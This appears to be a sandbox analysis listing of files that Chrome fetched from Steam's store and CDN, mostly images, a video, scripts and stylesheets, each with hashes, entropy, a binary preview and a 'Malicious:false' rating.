        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..kH.A..g.F^HJ{.f..#..... . ..f...R.B......~(("#./.B.......b$J$E.Z..H.J|...=..z......=........9svTTUe.l>..................{..2@,..>.v.WH.<.t ..4.R...T.....L.......x.8..U.v.....E.9..*....2mp>.4...d.(..*@+.6.R..p...%Kt>.4..Y?.....@}....q....*.j)*..Q..0Ig,..@...$9.E............t......\.JX:......n.....2..D.J..P.~.j.ULt..".7...A....I..!.:.(.......i<.... ...eIv.8(.nE.Q..@'..E....b...%9>.6.c.n....4...m.......f@..=..`..fa...\.kkI..$.x...NK1P......o...N...e...lQ..1~.lr.6.....@&.H...O\$@..?.T..;......`...h.!@7}&.=..t.. X&....&QE.{.t~.4...,.v.........6.n....!?...\"@..Ip|...L.a.F..i.........0..+&...p'8.R..|?.,.dD..x..i...`?m;.b..:o6..@.M..O?..0{..d'..:.+.8oe....Lw..oA.e.Lf.p.5v^..u....y.U....1....$..M..(.....09...2.......d^w/c.I....,._CmH.tV.G{...Y..?..k.u.&..T@Y#..BQ........9[b...k..h....i.o.Q..|.(a..J.N....`5X...2.OP'h.%e...`.8..0.\^,e.)..Rl...3.k.\....D.r..o}`..........)....@..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.9941773260279465
        Encrypted:true
        SSDEEP:24576:5i1fmpcM8u5zma1le3Xgy2q2Luh+ziXVvV0/9Oc0iWvvxrldDtF3:5V5zj2N2L8uiXNWFvn2vZldDb3
        MD5:1E807B0D11D4FACB92AF1FC111C0D06B
        SHA1:967CA5BE2CE3DBFE039B4A877C02DE242F3831B2
        SHA-256:308B35C01DE90CB8B669125D9E6C0937663E0267255BC810A03BF01F1BB29A0C
        SHA-512:16EF98AF25772E20D0DB23D0C61031112135909C57122663EF88DB207B08C6820BD87D7078BAE472795B07CFFCC6729C259FD2F6E30DB37FB61CF112D5E58026
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:1
        Preview:.SE......`.A>..y...@..@r.I..f.peghT.q.;W[.)<..c.4.@E.........g........B..;|.D{..cPQ.`..Q, ..<q...9.....=O.\`..Sa.......?...l...X.. ...|.Xnf./.].}7.23.m...Kw.....O)..u.?....p.=.....U.R..t...>.....B$.R...6......g._...|...@..U...pm&...w'A.... j.p...j.0 r_..JV.F.2#......o1...'.........B"../h..{.G.......[k..n.p.{Jmv..1. e....x....#......LU....n.*tr...Dw.4..t..H..`V...n.Q.9..;..\...d.zv...lT.C.k....j.Y.s.&.jf.]D^.4 *.C..A;0.15/C..|...J$....i#..fZ..r.e'R..Z|..h.... .s.N.......(k..../7.LeO.....$..x.......]k9..>..#i....H...).....l..^...vc.M\..=h$..../..;.2..I>...?.sT?..`.%5.._..L.fT|.v.;....H.:.-.>.~f<.>.y..t.....~<...m.nv.....)...M8.r.N...sa!l.s.V.....g...}.{..&...'...6N...$..n..S./#......\*t_..o.H..L.T..Cg5..[e.4+..K.i,....$.0..k...!e..M..(z3.{+g<..m. L2.Su&.7....#.H.X..T.......Ju) ...*.aqV....N.%.\.$.....[..u..x.N..w........e...K.X.x..]..~....J.IM.)..~(.@..t....qN.X.)......2I.B.W..0..4...#9..?^.D.4.=.'.n......?..+.....(..&g...S..{.o.M..e-..0.f9.$.U$..C3.g..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):88337
        Entropy (8bit):7.972642145594433
        Encrypted:false
        SSDEEP:1536:JBZyfBTVCSanUF5Krswe/5/4nI9mI6CESAs7vAjdt1nR7vODnhs0Ps1oh2TG:XyTVCG5lb/5gnI9tMSAsMfD7mDnhs0Pf
        MD5:C53A2DC5A8DFEF347A6C29C275872D30
        SHA1:8648A967ACCC30905AED1A52F071270DD83D3B9B
        SHA-256:489ED1E4DC4859460A0AA3DCC8F56CAD33BC016D0A71723C63CC2C00F5E77341
        SHA-512:09BE80619DC6287A02302B259400629DA671B079174429733FBCE8C2A8B0E13B792DEC8815E73F33E98C365D6979BB442BC8577C5928EFAC9EA70B3E560811AE
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/ss_2d325f8d0a7e89a92a03eb0faf094b5dcb752bb5.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................_.........................!.1..AQ."a.2q..#...BRbr...$3s.....456CSt....7cu....%..DTev...&(8Ed..................................7.......................!1AQ.."2aq..B.....R...#3..$bCr............?....hv}e.p..z.c.j-.... (2.U..{c..q.Km..."..q.F.:..$.-..G.}.p..c...KTE...x..k..j..........\...`...G.v..GPx?....R...&....GRd.a...R....s.c.e5.\.:.j.ZWB..2.\.2...|[.j.x.1............*.2..k.9.$s.M0...A.1KP...rA..../..Lx..+l..S)A.;.5.L.HY..K....%..V-.A.E%UR../..6..*.(....|..4..."..r.eo....9...l.h...J*...U...<.9#...5...Nx.......?.J2.....m.:Z+.......=Q9....w.'..........g..W;|?agl..f....Y$.R..j......v,p0.8b..8..\y-.t.=.....9.._q..gdG_*W.@.2J=...?x....g..pE..r.YH(H>...(.....8.V1...8=#.......P.......+.K..&...Fcx..z'R..x...e%-..3.o..h..*.'.~.@i`.=U....Q....&h{..9.\h....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):10191
        Entropy (8bit):7.9325106354111075
        Encrypted:false
        SSDEEP:192:FT6SR0SmWoEvx5WXWXJwm3tvgCVhvHKmD84z92f4G5gorZ29TzAdM86dBHRt:56SR/mx4ug9r3Q4J2f4GP2TzAgrt
        MD5:55A23BABD5C6F1F65F76B325F689BBC3
        SHA1:5ED451E60A284B8749C605C57F2AF155B80AF752
        SHA-256:B1F91FCBF766E7D9AB172DDFA1BA541A4D67ECEC810F5DE00F8AD9B9B8BFEC0A
        SHA-512:AE0BA7F9E4D0F5668D17668787D837FCFAC3A59721D03CB0943DBB5828C5D8B1B1283AF70D7416C829F1AA743B027A0DB3EB57094E05404F2BB8B15AE8C53539
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;..........................!.1.."AQ.a.2q.#BR..r..3.....b...................................8.......................!..1AQ."aq....2.....#B...R$b...............?......o*.....~..j.9......Me.d..N..m....c5.B.H..+uL.C...:=I'.~5....gx.zP..6..?s..Ix.....W#..2B3...!....T0k..S........~t{N..i"....).N..%e...x..h...,.x.ib.T.....Mt..5...!!.%!)Kc.Oo..L....U...B.h..$..;...e....Rw.g..Y..3.ZU.......S9.b.,..]z...G....>. .q.~.C6....P.Z.k.B. ...O.N.`.....U....%R"8@.%....?....kjdW.-..-%.....I......k.2.^....Om1.J6..u.k...L...J.C..#..}..rIZ0A<...m.n.q._......b)...R.......%......p .{{..a....>..#uF.M......;....0.....d...:S..-..o..0...[B.!!A..~.Tw..[f....T.L....@i......k....!.>.%.HT&..K....w6@!#....4=.M.E.}.......}'...1.<.f.....R/T;..BP..0.w...Y.........j.j\5..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3270
        Entropy (8bit):7.8300216097053745
        Encrypted:false
        SSDEEP:96:vhy1EClsxDnKk6Fe+6ZcAfHoqT/1s8roA:pyaWejTfIe10A
        MD5:63B8E7983C188E324D2F917FA76B95FA
        SHA1:D54F51C0C4E488BAC2C1ABB622A8CB2E2ED3033C
        SHA-256:1860CE787983F7607EF624DE6D950A768BB0740D576385ED6E605B54CAA425A1
        SHA-512:A8021BD5F08DBD25F621CACB2CE2B0585F7F88D6CA17794E3F812D6E249972930E6B28C5D0A745399CFF1AEB7AFB8A9CD8A046F9F8752195C069171C6EB32E07
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_ee3b313c9e5e22747cceb99a391966220ae3bbf7.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................>.........................!.1..Q."Aaq.23..r.....#$4BRb..CDS................................&......................!.1AQa.."q.2..............?..r..G zjvt4.a.9'DK..:...".l....~...,JE..S...$~xfE...c$g8.88t]dS6..>^z*...A..U.3(....$..P..X.2.A.8<.O.f.i.......V...,T=E.wZ*.;.Tt(..%..|..G...t..=.F.VH.O..eB..=..}sn...m&.."T.2D.Tm!'...i.....uA.!.....<..N..\.P.2]..........Q.k.....Us..N.v..DSh.x../F.UOh...|=Gr...0...T4e..........u.2o.N\.I.$..b...&Nr.<..v.KC.h..DqL.py.fI.p.$\.;.....[....i...#4.1.`....?.....6.@.i.$.......)P...4.A..L.c.}=.ZD...m.gG.7..u..G.7.....9...E.x..=........t4.X.~...M..=...\....c=.<.'..Zj.&....U.O..E...I.n.M.5."Vx....1.T..-.'.'H.oD..l..OO..U@M?JQ..Rd.C ....."I;....u.-.rL.G.x..h.f..,.;....S[...u..7M!......c{.p.:4k5..~....K.N-..m.Mm"2.)......g....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 25 x 25, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1816
        Entropy (8bit):7.335413459481553
        Encrypted:false
        SSDEEP:48:mwqQNn2xkJ3n7OO8oPTFC+6vUycoKGCAHcDsr9CQ:6Y2w72o7Fh68yLdHcYr9CQ
        MD5:C8A9A5322C7A32D42405AEC4ECC91E8C
        SHA1:A6A04E08067EBBC6E9D70361FAD164CAB634BD9D
        SHA-256:02E650004D02B883D1F77E3C9AB18F556D470CC4F41500917D0CDA68EC62D197
        SHA-512:F057B313CE4AEED427AC04B1278A8FFE105843CD0998CAC5E01DDBCD53CAFFCB5584239646A73C40281D671D22C2E163E0FC3F1A589FFF9E9479CAC206EB241B
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/search_icon_btn.png
        Preview:.PNG........IHDR...............c....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D62C327C9D6211E6BC85ED92E7B3F4DB" xmpMM:DocumentID="xmp.did:D62C327D9D6211E6BC85ED92E7B3F4DB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D62C327A9D6211E6BC85ED92E7B3F4DB" stRef:documentID="xmp.did:D62C327B9D6211E6BC85ED92E7B3F4DB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`......IDATx.U.k.W.?....fg?21..hT.......H-..VQ.-.......`...(>H...R,B.7...t.iM.i01...nv....;....1...M....a...=...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 27 x 21, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1283
        Entropy (8bit):6.804522396238829
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVgy28yULyJ3Vey7uytbGKIg2NXxqa37SV:IwqQNn2xDWLJ3xXJKg2NXjK
        MD5:6FD845DB37342E49CAF9A1B3D1268EA4
        SHA1:E380BB0F718887BA15FA5A62E06C368F39095660
        SHA-256:2B5E58C85345DCB11D869C8033CA7B7EB00A15C73554A59B553045BDE1A94ABD
        SHA-512:83DBC8420F91AB206D66981D6763017169927E68545629BC22C1265A773546196A2EA67F91F95D6C0EB7035E689D4581A8BA3B3A3AC797D2AE6CA8A237BB51A6
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............%....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D0D315BC12A911E49EBED2AEC7E84312" xmpMM:DocumentID="xmp.did:D0D315BD12A911E49EBED2AEC7E84312"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0D315BA12A911E49EBED2AEC7E84312" stRef:documentID="xmp.did:D0D315BB12A911E49EBED2AEC7E84312"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......wIDATx...J.0..3...Z<..9....>......^[.=...>.{P..F/...i.5~Y'K(Im]....L3.d&)I)...|8.....B.`p..I..1>.......=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):62374
        Entropy (8bit):7.978881649510389
        Encrypted:false
        SSDEEP:1536:suNAg5F/Nz+IBQQ92vA2K/m3XxsaYPcJtjbDw2RTRxQN5tR:FAg5F/N1BQ8Z/LBOtcMdaTtR
        MD5:7A407EA18400B7E0945AD8843D96B3FD
        SHA1:F759FC77E01050AD55AFD2466EE358AF2D3B1FE0
        SHA-256:BAC1DA638C45E6A51A1564E374798E5F21496D96B23877407C77EFBCBD81F6FC
        SHA-512:C8875B2515B45AD279F978194D6DF4E92C19C8A6CE0E55955F427F5662F267B372731B9F4AFEE3F84CFCEBD1FE27052781A411E293723733DDCF40F652420EC9
        Malicious:false
        Reputation:low
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................T.........................!.1.AQa."q.2.....#B.R.$35rst.....46Cb...7u.......%DcETv..................................;.......................!1.A."Q.2aq.......3..4B.#Rr..$CS.b............?..v[D.q..^D.L.b).=.x'.?Z.......9ct.R..c.V\.nf2..7....]B.N.t.........Vm5iX..J.8........<GU.. U.K_....-.....9...].5.a$l.@.......7."..#60..mW....(.Qx.M......+L..W.D...S..6+&.. ..qB.....11C......4.<.Ax.AF..[..."..[.]:6.....{S.Mf.]:$(4.+.z...D.....R.XR..4.PsPL....#.Gnd`.7..)r[.'..5]{..j.0...zS.F;R6{..FV.7.zV.9...b..Tj...*t&+{}..N..........T\...+ap)j..........B..=..F.{....i.\^...Z..=..".(z...<7.U....S.}k..........S....'.R..........p.....h...*.L...!#.v=...1..U.....-.FEge.UvM.....}.l%&.n%\...Q...e...c`.....J.. ..m^n#...z)9....I.@S.{..GO.Y....!k.[[.."..".q.C....,'K..;..eOP[
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (19987), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):20152
        Entropy (8bit):5.336413914084772
        Encrypted:false
        SSDEEP:384:+yBIOCWaxNWJb2ucCJRGZ43ftUwP/0os2Ld92Be8+n8swzuDKCiMeb94MHpSnVA:ghsbhNJZ1tQ2hxUzGSb94MHpSnu
        MD5:96DE48CBDACCD9BF92DEC79EF68BFF19
        SHA1:1D8AE62DE333E955DE1DC09C8D95ED00D1AF782D
        SHA-256:9A761000BC864C2DEAA03AC931379B6FAD6C80443304F0D7CBE9FCEF64F1BAF2
        SHA-512:9DDE4E494AA57E8BCE68AAB25057D2FC1923922BAEF326D5FA1E80C0A978C94F75FD27EDF8E329AA88F50BC7AAB57636EC83F31972CE8E99CBEF5CCEB5CF0AF6
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/manifest.js?v=lt5Iy9rM2b-S&l=english
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..var CLSTAMP="8913299";(()=>{"use strict";var e,a,n,s,d,c={},f={};function o(e){var a=f[e];if(void 0!==a)return a.exports;var n=f[e]={id:e,loaded:!1,exports:{}};return c[e].call(n.exports,n,n.exports,o),n.loaded=!0,n.exports}o.m=c,e=[],o.O=(a,n,s,d)=>{if(!n){var c=1/0;for(i=0;i<e.length;i++){for(var[n,s,d]=e[i],f=!0,b=0;b<n.length;b++)(!1&d||c>=d)&&Object.keys(o.O).every((e=>o.O[e](n[b])))?n.splice(b--,1):(f=!1,d<c&&(c=d));if(f){e.splice(i--,1);var r=s();void 0!==r&&(a=r)}}return a}d=d||0;for(var i=e.length;i>0&&e[i-1][2]>d;i--)e[i]=e[i-1];e[i]=[n,s,d]},o.n=e=>{var a=e&&e.__esModule?()=>e.default:()=>e;return o.d(a,{a}),a},n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,o.t=function(e,s){if(1&s&&(e=this(e)),8&s)return e;if("object"==typeof e&&e){if(4&s&&e.__esModule)return e;if(16&s&&"function"==typeof e.t
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):120659
        Entropy (8bit):5.2177666867072645
        Encrypted:false
        SSDEEP:3072:uo1PChVzkrEAnuEyIZkvSPvjYwYBihp8vGUvX8ZkAXNNf5O/6Js0tU2fYGUz85cE:uo1PChVzkrEAnuEyIZkvSPvjYwYBihpV
        MD5:F7833ADC67269B38749E0987FAF39C0C
        SHA1:ED0DEC3D9F1A7B3B7E6A07C2CA5BD59323DC9C63
        SHA-256:2FA3200C04DCEFA39FEB70882597B1196867903587E3873042433D675936F4ED
        SHA-512:40AD33599465FAF62F10DFF1EABC389A1E18727EEC987F3008258C2DD42D20BA54CC5553538F535C3DA2AA7173B2FB0E010BD6A4D92683890D69C2A74F579F13
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/v6/home.css?v=94M63Gcmmzh0&l=english
        Preview:.....home_page_content {...position: relative;...width: 940px;...margin: 0 auto;..}.....home_page_body_ctn {...min-width: 972px;...position: relative;...overflow: hidden;..}.........page_background_holder {...position: absolute;...top: 0;...right: 0;...bottom: 0;...left: 0;...background-repeat: no-repeat;...background-position: center top;..}.....page_background_holder_mobile {.. position: absolute;.. top: 0;.. right: 0;.. bottom: 0;.. left: 0;.. background-repeat: no-repeat;.. background-position: center top;.. display: none;..}.....home_page_takeover_sizer_mobile {.. display: none;..}..../* Hide mobile versions by default */..html.responsive .fullscreen-bg__video_mobile {.. display: none;..}....@media all and (max-width: 910px) {.. body.responsive_page .home_page_body_ctn.has_takeover .fullscreen-bg__video {.. height: 46vw;.. }.. /* takeovers should now scale down based on the center ~960 pixels */.. body.responsive_page .page_backgrou
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:dropped
        Size (bytes):3684
        Entropy (8bit):4.780503743341751
        Encrypted:false
        SSDEEP:96:CXQSfzclE2Bc4N/waCVAh+m8CE2n1HNBRjVO2PGPLYOgzypH6YB:WQAzSE2BB9/c1CEEtoFUOgzs6YB
        MD5:B7A7E43284E2FFE806AC1BC27C1F6A87
        SHA1:E8196489E2AE99EC6EB33995B5A3E108D6E44DE0
        SHA-256:C3A7C646A1305017F22423030CB5A12ACC9F96B64013DCEF7AEB80567B542CBB
        SHA-512:757E4F382A864CAC9F975220C28586F5EA415B2E2215375C1A47E011A9190FCD15313D399007539F150A6DF0378B8F2022AC88E995693AB03A9F5656BFE40832
        Malicious:false
        Reputation:low
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="355.666px" height="89.333px" viewBox="0 0 355.666 89.333" enable-background="new 0 0 355.666 89.333"... xml:space="preserve">..<g>...<path fill="#C5C3C0" d="M44.238,0.601C21,0.601,1.963,18.519,0.154,41.29l23.71,9.803c2.009-1.374,4.436-2.179,7.047-2.179....c0.234,0,0.467,0.008,0.698,0.021l10.544-15.283c0-0.073-0.001-0.144-0.001-0.216c0-9.199,7.483-16.683,16.683-16.683....c9.199,0,16.682,7.484,16.682,16.683c0,9.199-7.483,16.684-16.682,16.684c-0.127,0-0.253-0.003-0.379-0.006l-15.038,10.73....c0.008,0.195,0.015,0.394,0.015,0.592c0,6.906-5.617,12.522-12.522,12.522c-6.061,0-11.129-4.326-12.277-10.055L1.678,56.893....c5.25,18.5
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 244 x 212, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):3777
        Entropy (8bit):7.855078020337897
        Encrypted:false
        SSDEEP:96:W5Zsk8bb6l5qnCoghGfkm37QP00rqGDXrg/sG3vUx+Iocg2fkjGfkjky:W5H8o5qe0Mu7600WiXE/v3ve+Is2MjGm
        MD5:EABC76EB57FEAE44ADD7FAEAD028521E
        SHA1:4E3E53938FAD15661D2D046A868338841A95DB19
        SHA-256:FC9E6260A2706AE146282D77E67BC1B74688435F8912AB4C1932641EEC28BFFA
        SHA-512:5C6DA6EEEFDDF321C2BC7E39A134E0A3140A9F93AD1560B2E102EF60EC218C29AAE14ED344C79E25CC5493CD15551040D8C909DE28DCAB02034D787563104E07
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...cIDATx..._LTg...w.i........Vmk.6X....i..F..{...^..^4Mz..6ml..nb ]....e.a....v..)...a.E.).#..>.0.3g.Kww8/..'y.g........sf.....W.2.... ...4....@......@...h... ...4....@. ....@...h... ...4....@. ....@...h......2....P^^...sVEE....r..={f.K....I...F#R...g..vN..k...%.Oj..6...h.:"...0......K.E..G..."..@.x..w.*...'."_..A...L.r....I..W........^H...Q...:;..h4j.z..8..,..a/...w.Fm.Meg.C.a.|..w.....u.`.zM.U.=....4e...=.U.....[.h.z..j...Te.a..z...+RUR.8.N.u.INN..o?a........E...o}.#...._....Oc..=.Orr.&.!;;[=..3..q.....?H...0{.S._m.B..(.6.Rm.)...]..%....3..c..Dk.M..z.%.c..NTd...}..90..tj.v.#.L..M.t.uc.<>..3..;..:..G..9..I.....%.@.`..d....@...h.@. ...4`6...M.@'.n......I/z`5>>.K...X7Z.Z.....5.7..h+.N.h....gS...8...........@..Njj.}....'...{`...'T{....mmm'.t2....?V..=C.......=b......`|s.@'zC.N......."..>k...M......)...}....?.r...+z.x....JTII.....4.O_....s..?>W..?.O.....`...t{...r..Z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 46 x 36, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1290
        Entropy (8bit):6.7616543307680725
        Encrypted:false
        SSDEEP:24:Xcy1he91Wwjx82lY2T3ouVW7fyJ3VtZS4GA3FdLZCJurYUgQVI1L12Kz+9:swqQNn2x1J3Jpr3FdIJzQaRz+9
        MD5:CB06992B64D4961EDE5F7DA47804DE5C
        SHA1:228FD206FB76B5A05FBF36B61C8E4E4749D534D0
        SHA-256:61405865FDC0F0B1B658B0AA3098B9676A5E6D7D88403945269497B10D0EBD78
        SHA-512:0B1709FF9B3C6CD8D5ABE177C543835A2004E7C8EDCC9B8EBB2D2B5036CBB0059E5B0409A69DC721B98EF98BE2C61E01C0A8B3BC12E7B87A22561B39C9257501
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/arrows.png
        Preview:.PNG........IHDR.......$......".Q....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:9301916979CC11E6BFE9CE978F5FF8DD" xmpMM:DocumentID="xmp.did:9301916A79CC11E6BFE9CE978F5FF8DD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9301916779CC11E6BFE9CE978F5FF8DD" stRef:documentID="xmp.did:9301916879CC11E6BFE9CE978F5FF8DD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......~IDATx....A../J.J...x.=j.)uTj./@<.R(TZ.G@!.5.[......{.L2....\nog.Q.B..C. ;.'!Y.S.[.<.W\ ..@w..Pl..6.Y..Lx.}K
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):27
        Entropy (8bit):3.661932872373583
        Encrypted:false
        SSDEEP:3:YWQRAW6kYN:YWQmT
        MD5:CC23E88E5E3A1AEFB54805284245A25B
        SHA1:A255901026FA8C111C9CC658E78D3C46BE479128
        SHA-256:8F22FEBFD2EBD5AD2A15E6C3B4647CAFE6B3C7DBAC8B59530EF76A378608C4B9
        SHA-512:9B4202B9074BD2E7FBBA84BBA9C89FC0D8CA269C2FE51E496830D0C8734CFA89E8B32ADEB36DC37FBFFB253425228777062049468ECE876A144C9B6233197657
        Malicious:false
        Reputation:low
        Preview:{"success":false,"error":8}
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):3577
        Entropy (8bit):7.81935837646796
        Encrypted:false
        SSDEEP:96:jC0Jifi7iijTONHXysMOADWwRbNNC0EYuosbIqEB17AdA:jticHIiTLDx/C0EYIbIvv
        MD5:7A010186764D3A96D38F155827D2986B
        SHA1:6251C10C8C054E4C7038271257F8903E73105F42
        SHA-256:3029C050BC7D01095192D53355DF04381CF0EEB16D76D1BC4CE107BC1A60117E
        SHA-512:537C1B51156BF88BF71174028889298E20C5C29B9372A11F75EE0D9CC429165AB708DE397FE812D339C0F1EADD3A311AB8C6F0D8540D30AA86B87F91F62DBBFA
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................X..........................!..1.AQ...."aq...6TUu.........#$%'2457ERSct..(38BCDFVdr.....................................=..........................!1.AQa...."24RSq..........5.#Br..............?...p.0.0.os.+..+..70.....`....h.o@.z........I....+.h....z...........=3~E....M.V.#.8..v>..R.."....N.Nc.U..C.]h.w-.6....m....+....R.E.\G.}O.!M....+.......;...}O...NzRc...C.]c.......[..~c..y._.Kj+...f...>2...d....c......W.`..+......&.].V.....s..u...q2.s..l.a.......S...xJ...%B.^iH.....a.&]K,..]Y.P..(....q..Q......H...u...@...TgY..HML4M..aKI<...r.9Y.&..\.@....3.*..8..5....2.2..nQ.T...D..P*..+E2uhP.*L..#..k.;...S.*..wc..Rg.U.4.........z.<.........m......B...G..#..x/[.{...m.....zLq.=..f.<s.3$...L-H7x.t.~..6.~.c....n+......Nj....../q..Zu.%.I.ZP>...H$..[Ov1.0...1R
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):42048
        Entropy (8bit):7.963851931335445
        Encrypted:false
        SSDEEP:768:5mNZ2DaZz1ecbjaH/rsMG2DuLQldStxF1wR3IkldFhDBrVhBTTmdnrq+:YWaZx7bjuIX2Stf1wpIg3r/WVX
        MD5:A4A1E59187C9C4597B2A4728A747F46D
        SHA1:2C8DB5FF6E7B9193C251558BA2BC07326958E0E5
        SHA-256:49E22586A4755E9AE707CFD1CA92A7B83611DB6BEB91AE28E6D85F501003E1FA
        SHA-512:EC8706A21854092D7B045E40E664070B8F25EF41BD66F0D3E5FBB231DD5456372A9DBE17774D6114E8BA1BE873C3F788EA7A92C62A8B1A5801FCD5A7137AFB7B
        Malicious:false
        Reputation:low
